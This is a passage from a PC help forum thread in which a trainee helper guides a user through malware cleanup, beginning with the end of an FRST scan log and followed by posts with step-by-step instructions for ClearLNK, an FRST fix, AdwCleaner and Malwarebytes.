                2017-04-12 14:27 - 2016-08-01 14:09 - 00000000 ____D C:\ProgramData\SlimWare Utilities, Inc
                2017-04-12 14:27 - 2016-08-01 13:59 - 00000000 ____D C:\Users\hilton\AppData\Local\SlimWare Utilities Inc
                2017-04-12 14:27 - 2016-07-05 14:36 - 00000000 ____D C:\Users\hilton\AppData\Local\Amazon Music
                2017-04-12 14:27 - 2016-07-02 15:54 - 00000000 ____D C:\Users\hilton\AppData\Local\PC_Drivers_Headquarters
                2017-04-12 14:27 - 2016-07-02 15:53 - 00000000 ____D C:\Program Files\Driver Support
                2017-04-12 14:27 - 2016-07-02 15:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
                2017-04-12 14:27 - 2016-07-02 15:47 - 00000000 ____D C:\Program Files\CCleaner
                2017-04-12 14:27 - 2016-07-02 15:09 - 00000000 ____D C:\ProgramData\PCPitstop
                2017-04-12 14:27 - 2012-07-23 19:53 - 00000000 ____D C:\Program Files\Common Files\postureAgent
                2017-04-12 14:27 - 2012-07-23 19:52 - 00000000 ____D C:\Program Files\Intel
                2017-04-12 14:27 - 2009-07-13 22:37 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
                2017-04-12 14:24 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\registration
                2017-04-12 14:23 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\Vss
                2017-04-12 14:23 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\system32\spool
                2017-04-12 14:22 - 2009-07-14 00:34 - 00000000 ____D C:\Windows\ServiceProfiles
                2017-04-12 14:22 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\PLA
                2017-04-12 14:21 - 2009-07-13 22:37 - 00000000 ____D C:\Windows\Help
                2017-04-12 14:19 - 2017-02-07 16:45 - 00000000 ____D C:\Users\hilton\Downloads\Lang
                2017-04-12 14:19 - 2016-12-30 13:38 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Mozilla
                2017-04-12 14:19 - 2016-08-12 12:28 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Dashlane
                2017-04-12 14:19 - 2016-07-27 14:22 - 00000000 ____D C:\Users\hilton\Documents\Fax
                2017-04-12 14:19 - 2016-07-04 15:13 - 00000000 ____D C:\Users\hilton\AppData\Roaming\OpenOffice
                2017-04-12 14:19 - 2016-06-30 18:39 - 00000000 ____D C:\Users\hilton\Documents\Stardock
                2017-04-12 14:19 - 2016-06-30 18:39 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Stardock
                2017-04-12 14:19 - 2016-06-29 17:49 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Adobe
                2017-04-12 14:19 - 2016-06-29 16:31 - 00000000 ____D C:\Users\hilton\AppData\Local\VirtualStore
                2017-04-12 14:18 - 2016-12-30 13:38 - 00000000 ____D C:\Users\hilton\AppData\Local\Mozilla
                2017-04-12 14:16 - 2016-12-25 17:07 - 00000000 ____D C:\Users\hilton\AppData\Local\Google
                2017-04-12 14:16 - 2016-12-25 17:06 - 00000000 ____D C:\Users\hilton\AppData\Local\Apps\2.0
                2017-04-12 14:16 - 2016-08-21 14:27 - 00000000 ____D C:\Users\hilton\AppData\Local\Microsoft Games
                2017-04-12 14:15 - 2016-08-01 21:31 - 00000000 ____D C:\ProgramData\Package Cache
                2017-04-12 14:15 - 2016-06-30 18:39 - 00000000 ____D C:\ProgramData\Stardock
                2017-04-12 14:14 - 2017-02-27 15:03 - 00000000 ____D C:\Program Files\WIDCOMM
                2017-04-12 14:14 - 2016-12-18 22:19 - 00000000 ____D C:\ProgramData\AVAST Software
                2017-04-12 14:14 - 2016-09-26 12:37 - 00000000 ____D C:\Program Files\Synaptics
                2017-04-12 14:14 - 2016-07-13 12:28 - 00000000 ____D C:\ProgramData\Adobe
                2017-04-12 14:14 - 2016-07-05 14:18 - 00000000 ___HD C:\ProgramData\CanonBJ
                2017-04-12 14:14 - 2016-07-02 15:54 - 00000000 ____D C:\ProgramData\Driver Support
                2017-04-12 14:14 - 2016-06-30 18:39 - 00000000 ____D C:\Program Files\Stardock
                2017-04-12 14:14 - 2016-06-29 18:32 - 00000000 ____D C:\Program Files\Siber Systems
                2017-04-12 14:14 - 2009-07-13 22:37 - 00000000 ____D C:\Program Files\Windows NT
                2017-04-12 14:13 - 2016-08-31 14:14 - 00000000 ____D C:\Program Files\SAMSUNG
                2017-04-12 14:13 - 2016-07-04 15:01 - 00000000 ____D C:\Program Files\OpenOffice 4
                2017-04-12 14:13 - 2016-07-02 15:09 - 00000000 ____D C:\Program Files\PCPitstop
                2017-04-12 14:13 - 2009-07-14 00:52 - 00000000 ____D C:\Program Files\MSBuild
                2017-04-12 14:12 - 2017-01-28 15:19 - 00000000 ____D C:\Program Files\Canon
                2017-04-12 14:12 - 2017-01-28 15:13 - 00000000 ___HD C:\Program Files\CanonBJ
                2017-04-12 14:12 - 2016-12-25 17:07 - 00000000 ____D C:\Program Files\Google
                2017-04-12 14:12 - 2016-12-18 22:21 - 00000000 ____D C:\Program Files\Common Files\AV
                2017-04-12 14:12 - 2016-12-18 22:19 - 00000000 ____D C:\Program Files\AVAST Software
                2017-04-12 14:12 - 2016-07-13 12:28 - 00000000 ____D C:\Program Files\Common Files\Adobe
                2017-04-12 14:12 - 2012-07-23 19:53 - 00000000 ___HD C:\Program Files\InstallShield Installation Information
                2017-04-12 14:10 - 2016-07-13 12:28 - 00000000 ____D C:\Program Files\Adobe
                2017-04-12 14:10 - 2012-07-23 19:53 - 00000000 ____D C:\Program Files\Analog Devices
                2017-04-12 14:02 - 2016-07-27 13:52 - 00000543 _____ C:\Users\hilton\Desktop\Calendar -.website
                2017-04-12 13:49 - 2016-08-03 15:21 - 00000494 _____ C:\Users\hilton\Desktop\FLSurvey.website
                2017-04-11 16:08 - 2016-07-11 16:19 - 00000479 _____ C:\Users\hilton\Desktop\BING.website
                2017-04-11 15:55 - 2016-12-30 15:20 - 00003736 _____ C:\Users\hilton\Desktop\AmazonSmil.website
                2017-04-10 16:59 - 2016-11-21 15:54 - 00000582 _____ C:\Users\hilton\Desktop\where is my phone android - Google Search.website
                2017-04-09 11:49 - 2016-06-29 19:04 - 00000466 _____ C:\Users\hilton\Desktop\Discover.website
                2017-04-08 15:56 - 2016-07-05 15:28 - 00000616 _____ C:\Users\hilton\Desktop\Time Warner Cable.website
                2017-04-08 11:53 - 2016-07-05 13:57 - 00000422 _____ C:\Users\hilton\Desktop\AAA.website
                2017-04-06 15:16 - 2016-07-10 13:21 - 00000494 _____ C:\Users\hilton\Desktop\Speedtest.net (1).website
                2017-04-06 13:41 - 2016-07-03 13:44 - 00000476 _____ C:\Users\hilton\Desktop\YouTube.website
                2017-04-05 10:15 - 2016-07-05 15:59 - 00000429 _____ C:\Users\hilton\Desktop\CoaguChek Link.website
                2017-04-02 12:21 - 2016-08-02 12:37 - 00000451 _____ C:\Users\hilton\Desktop\Yahoo.website
                2017-04-02 12:09 - 2016-07-01 13:17 - 00000413 _____ C:\Users\hilton\Desktop\humanaDRU.website
                2017-03-31 14:45 - 2017-01-30 14:46 - 00000488 _____ C:\Users\hilton\Desktop\Home Delivery Supplies.website
                2017-03-31 14:20 - 2016-07-03 16:25 - 00000501 _____ C:\Users\hilton\Desktop\Komando.com.website
                2017-03-27 13:27 - 2017-03-09 15:08 - 00000563 _____ C:\Users\hilton\Desktop\USASACUP and 9thASA - A club for 9th ASA and USASACUP war stories - Yahoo Groups.website
                2017-03-27 10:29 - 2016-08-31 11:56 - 00000507 _____ C:\Users\hilton\Desktop\Pharmacy.website
                2017-03-26 15:37 - 2016-11-19 17:24 - 00000501 _____ C:\Users\hilton\Desktop\TiVoCommunity Forum.website
                2017-03-26 13:18 - 2016-07-05 15:30 - 00000493 _____ C:\Users\hilton\Desktop\eBay.website
                2017-03-20 03:56 - 2016-06-27 18:58 - 00181232 _____ C:\Windows\Minidump\032017-34242-01.dmp
                2017-03-19 15:15 - 2017-03-12 14:18 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Kodi
                2017-03-19 13:44 - 2016-06-30 16:50 - 00000486 _____ C:\Users\hilton\Desktop\DUKE.website
                2017-03-19 10:49 - 2016-07-02 15:47 - 00000972 _____ C:\Users\Public\Desktop\CCleaner.lnk
                2017-03-19 10:49 - 2016-07-02 15:47 - 00000972 _____ C:\ProgramData\Desktop\CCleaner.lnk
                2017-03-19 10:45 - 2016-08-16 11:51 - 00000000 ____D C:\Users\hilton\AppData\Local\CrashDumps
                2017-03-19 01:00 - 2016-07-03 13:23 - 00000000 ____D C:\Users\hilton\AppData\Local\ElevatedDiagnostics
                2017-03-15 03:22 - 2009-07-14 00:52 - 00000000 ____D C:\Program Files\DVD Maker
                2017-03-14 16:29 - 2016-08-02 13:58 - 00000522 _____ C:\Users\hilton\Desktop\googole.website

                ==================== Bamital & volsnap ======================

                (There is no automatic fix for files that do not pass verification.)

                C:\Windows\explorer.exe => File is digitally signed
                C:\Windows\system32\winlogon.exe => File is digitally signed
                C:\Windows\system32\wininit.exe => File is digitally signed
                C:\Windows\system32\svchost.exe => File is digitally signed
                C:\Windows\system32\services.exe => File is digitally signed
                C:\Windows\system32\User32.dll => File is digitally signed
                C:\Windows\system32\userinit.exe => File is digitally signed
                C:\Windows\system32\rpcss.dll => File is digitally signed
                C:\Windows\system32\dnsapi.dll => File is digitally signed
                C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

                LastRegBack: 2017-04-13 00:19

                Comment

                • system
                  PCHF Owner
                  • Jan 2015
                  • 7634

                  #23
                  Hello Hefs, just so you know I am training here in malware removal and before I can present any fix to you they will have to be checked by my teacher. That should not be such a bad thing because two pairs of eyes may be better than one, even though it may be a little slower than usual. Hope you are OK with this and I hope you stay with us until we give you the all clear.

                  I see you have already used some tools, and when we finish I will help you remove them all. Don’t be concerned about the stuff Malwarebytes found and quarantined, it’s safe there and will be dealt with.

                  Also where possible please download and run any tools from your desktop as previously requested. Whilst I check your log files can you please follow the instructions below and we will clean up your shortcuts.

                  As you ran FRST from your downloads folder the Shortcut.txt file will be there. Can you please move it to your desktop?

                  Download ClearLNK and save it to your desktop.
                  Drag the file Shortcut.txt made with FRST earlier.
                  As per picture.
                  A report on the work will be produced as a file ClearLNK- .log, post that log please.

                  https://pchelpforum.net/proxy.php?image=https%3A%2F%2Fup2sha.re%2Fuploads%2F2015%2F3%2FBPD7B3BAgEQl.gif&hash=f65630ba2178027f4643224f28999e44

                  Comment

                  • Hilton_Heflin
                    PCHF Member
                    • Aug 2016
                    • 134

                    #24
                    ok..no problem..no hurry..thanks for the help..

                    Comment

                    • Hilton_Heflin
                      PCHF Member
                      • Aug 2016
                      • 134

                      #25
                      ooops..let me do it right this time …sorry..

                      Comment

                      • Hilton_Heflin
                        PCHF Member
                        • Aug 2016
                        • 134

                        #26
                        Hope this is right..
                        By the way…almost all my short cuts disappeared when I ran this ??? Will they come back ???

                        Comment

                        • system
                          PCHF Owner
                          • Jan 2015
                          • 7634

                          #27
                          Hello Hefs, will return tomorrow

                          Comment

                          • system
                            PCHF Owner
                            • Jan 2015
                            • 7634

                            #28
                            Hello Hefs, We will return to your shortcuts after we have cleaned your machine. In the meantime you can recreate any necessary ones.

                            FRST fix.
                            [ul]
                            [li]Please download the attached Fixlist.txt file to your desktop.[/li]
                            [li]It is important that both the Fixlist file and FRST are in the same location or the fix will not work.[/li]
                            [li]Run FRST and click the button marked fix once.[/li]
                            [li]FRST will take a while to run the fix and at the completion will reboot your PC, please allow this.[/li]
                            [li]When your computer restarts FRST will generate a log file on your desktop called Fixlog.txt[/li]
                            [li]Can you please Copy and paste the contents of that file in your next reply.[/li]
                            [li]PLEASE NOTE: this script was specifically written for use on this particular machine. Running this fix on another machine may permanently damage the operating system.[/li][/ul]

                            Adware Cleaner Scan.

                            Please download AdwCleaner by Malwarebytes onto your desktop.
                            [ul]
                            [li]Close all open programs and internet browsers.[/li]
                            [li]Double click on adwcleaner.exe to run the tool.[/li]
                            [li]Click on Scan button.[/li]
                            [li]When the scan has finished click on Clean button.[/li]
                            [li]Your computer will be rebooted automatically. A text file will open after the restart.[/li]
                            [li]Please post the contents of that logfile with your next reply.[/li]
                            [li]You can find the logfile at C:\AdwCleaner[S1].txt as well.[/li][/ul]

                            Malwarebytes.
                            [ul]
                            [li]Download MalwareBytes Anti-Malware : https://www.malwarebytes.com/mwb-download/ take the free version ( on the left )[/li]
                            [li]Perform the installation[/li]
                            [li]Uncheck “Enable Free Trial of Malwarebytes Anti-Malware Premium” if it’s asked[/li]
                            [li]Malwarebytes will update, let this update[/li]
                            [li]Click on the “Settings” tab and then on the “Detection and Protection” tab, Check the box “Search for Rootkits”[/li]
                            [li]Click on the “Analysis” tab and then on “Start analysis”[/li]
                            [li]Once the review is complete, check that all detections are checked and then click [Delete Selection][/li]
                            [li]If Malwarebytes asks you to restart your PC, click “Yes”[/li]
                            [li]When your PC restarts, restart Malwarebytes[/li]
                            [li]Open the “History” tab and then “Application logs”[/li]
                            [li]Double click on the last Scan Log in date (the one above)[/li]
                            [li]At the bottom click [Export] → select “Text file (* .txt)”[/li]
                            [li]In the explorer select the desktop, name it mbam.txt, click [Save][/li][/ul]

                            Your next reply should contain the contents of
                            [ol]
                            [li]Fixlog.txt[/li]
                            [li]AdwCleaner[xx].txt[/li]
                            [li]mbam.txt[/li][/ol]
                            Should you have any questions or difficulty with these instructions, please ask

                            Comment

                            • Hilton_Heflin
                              PCHF Member
                              • Aug 2016
                              • 134

                              #29
                              Originally posted by gus
                              Hello Hefs, We will return to your shortcuts after we have cleaned your machine. In the meantime you can recreate any necessary ones.

                              FRST fix.
                              [ul]
                              [li]Please download the attached Fixlist.txt file to your desktop.[/li]
                              [li]It is important that both the Fixlist file and FRST are in the same location or the fix will not work.[/li]
                              [li]Run FRST and click the button marked fix once.[/li]
                              [li]FRST will take a while to run the fix and at the completion will reboot your PC, please allow this.[/li]
                              [li]When your computer restarts FRST will generate a log file on your desktop called Fixlog.txt[/li]
                              [li]Can you please Copy and paste the contents of that file in your next reply.[/li]
                              [li]PLEASE NOTE: this script was specifically written for use on this particular machine. Running this fix on another machine may permanently damage the operating system.[/li][/ul]

                              Adware Cleaner Scan.

                              Please download AdwCleaner by Malwarebytes onto your desktop.
                              [ul]
                              [li]Close all open programs and internet browsers.[/li]
                              [li]Double click on adwcleaner.exe to run the tool.[/li]
                              [li]Click on Scan button.[/li]
                              [li]When the scan has finished click on Clean button.[/li]
                              [li]Your computer will be rebooted automatically. A text file will open after the restart.[/li]
                              [li]Please post the contents of that logfile with your next reply.[/li]
                              [li]You can find the logfile at C:\AdwCleaner[S1].txt as well.[/li][/ul]

                              Malwarebytes.
                              [ul]
                              [li]Download MalwareBytes Anti-Malware : https://www.malwarebytes.com/mwb-download/ take the free version ( on the left )[/li]
                              [li]Perform the installation[/li]
                              [li]Uncheck “Enable Free Trial of Malwarebytes Anti-Malware Premium” if it’s asked[/li]
                              [li]Malwarebytes will update, let this update[/li]
                              [li]Click on the “Settings” tab and then on the “Detection and Protection” tab, Check the box “Search for Rootkits”[/li]
                              [li]Click on the “Analysis” tab and then on “Start analysis”[/li]
                              [li]Once the review is complete, check that all detections are checked and then click [Delete Selection][/li]
                              [li]If Malwarebytes asks you to restart your PC, click “Yes”[/li]
                              [li]When your PC restarts, restart Malwarebytes[/li]
                              [li]Open the “History” tab and then “Application logs”[/li]
                              [li]Double click on the last Scan Log in date (the one above)[/li]
                              [li]At the bottom click [Export] → select “Text file (* .txt)”[/li]
                              [li]In the explorer select the desktop, name it mbam.txt, click [Save][/li][/ul]

                              Your next reply should contain the contents of
                              [ol]
                              [li]Fixlog.txt[/li]
                              [li]AdwCleaner[xx].txt[/li]
                              [li]mbam.txt[/li][/ol]
                              Should you have any questions or difficulty with these instructions, please ask


                              ok..thanks for the info..will be home all day tomorrow and will work on this..
                              Thanks,
                              hefs

                              Comment

                              • Hilton_Heflin
                                PCHF Member
                                • Aug 2016
                                • 134

                                #30
                                Originally posted by Hilton Heflin


                                ok..thanks for the info..will be home all day tomorrow and will work on this..
                                Thanks,
                                hefs


                                ok..downloaded both fixit.txt and frst to computer..they went into desktop download folder… put them over on desktop…ran scan on frst and when it finished I ran FIX..that was an hour ago and it is still running…normal ???

                                Comment
